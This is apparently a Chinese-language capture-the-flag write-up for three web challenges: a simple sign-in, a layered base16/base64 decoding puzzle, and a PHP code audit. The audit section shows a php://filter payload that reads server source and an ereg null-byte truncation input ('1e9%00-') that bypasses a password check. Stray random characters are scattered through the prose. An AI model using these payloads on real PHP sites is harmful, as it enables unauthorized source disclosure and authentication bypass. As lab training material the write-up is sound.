WEB

簽到題

打開題目

image.png

0改成1

image.png

測試你與flag的緣分

題目

image.png

打開flag.txt 甸各，一段js密碼，解密是一串base16焰坪，再解是qp趣倾，最后，假的密碼
回到題目某饰，查看源碼儒恋，發(fā)現(xiàn)一段base16

image.png

解密善绎，解出來是base64，解兩次诫尽，flag

簡單的代碼審計

打開題目一片空白,查看源碼

image.png

image.png

題目是代碼審計禀酱，php偽協(xié)議，

file=php://filter/read=convert.base64-encode/resource=once.php

image.png

出來一串base64

PGh0bWw+PGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1HQksiPg0KCTx0aXRsZT5PbmNlIE1vcmU8L3RpdGxlPg0KPC9oZWFkPg0KPGJvZHk+PGJyPg0KPGNlbnRlcj4NCjxwPllvdSBwYXNzd29yZCBtdXN0IGJlIGFscGhhbnVtZXJpYzwvcD48YnI+DQo8Zm9ybSBtZXRob2Q9ImdldCI+DQoJPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBhc3N3b3JkIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPjxicj48YnI+DQoJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkNoZWNrIj4NCjwvZm9ybT4NCjxocj48YnI+DQo8L2JvZHk+PC9odG1sPg0KPD9waHANCmVycm9yX3JlcG9ydGluZygwKTsgDQppbmNsdWRlX29uY2UoJy4vZmxhZy9mbGFnMC5waHAnKTsNCmlmIChpc3NldCAoJF9HRVRbJ3Bhc3N3b3JkJ10pKSB7DQoJaWYgKGVyZWcgKCJeW2EtekEtWjAtOV0rJCIsICRfR0VUWydwYXNzd29yZCddKSA9PT0gRkFMU0UpDQoJew0KCQllY2hvICc8cD5Zb3UgcGFzc3dvcmQgbXVzdCBiZSBhbHBoYW51bWVyaWM8L3A+JzsNCgl9DQoJZWxzZSBpZiAoc3RybGVuKCRfR0VUWydwYXNzd29yZCddKSA8IDggJiYgJF9HRVRbJ3Bhc3N3b3JkJ10gPiA5OTk5OTk5OTkpDQoJew0KCQlpZiAoc3RycG9zICgkX0dFVFsncGFzc3dvcmQnXSwgJyotKicpICE9PSBGQUxTRSkNCgkJew0KCQkJZGllKCdGbGFnOiAnIC4gJGZsYWcpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJZWNobygnPHA+Ki0qIGhhdmUgbm90IGJlZW4gZm91bmQ8L3A+Jyk7DQoJCX0NCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAnPHA+SW52YWxpZCBwYXNzd29yZDwvcD4nOw0KCX0NCn0NCj8+DQo=

base 64解密出來

<html><head>
<meta http-equiv="content-type" content="text/html; charset=GBK">
    <title>Once More</title>
</head>
<body><br>
<center>
<p>You password must be alphanumeric</p><br>
<form method="get">
    <input type="text" name="password" placeholder="Password"><br><br>
    <input type="submit" value="Check">
</form>
<hr><br>
</body></html>
<?php
error_reporting(0); 
include_once('./flag/flag0.php');
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 999999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>

ereg():輸入的password必須是大小寫字母和數(shù)字
strlen（）：輸入值必須大于999999999并且長度小于8
strops():輸入的值中必須含有 * - *
利用ereg函數(shù)的截斷漏洞可以構(gòu)造playload:1e9%00-
得到flag

image.png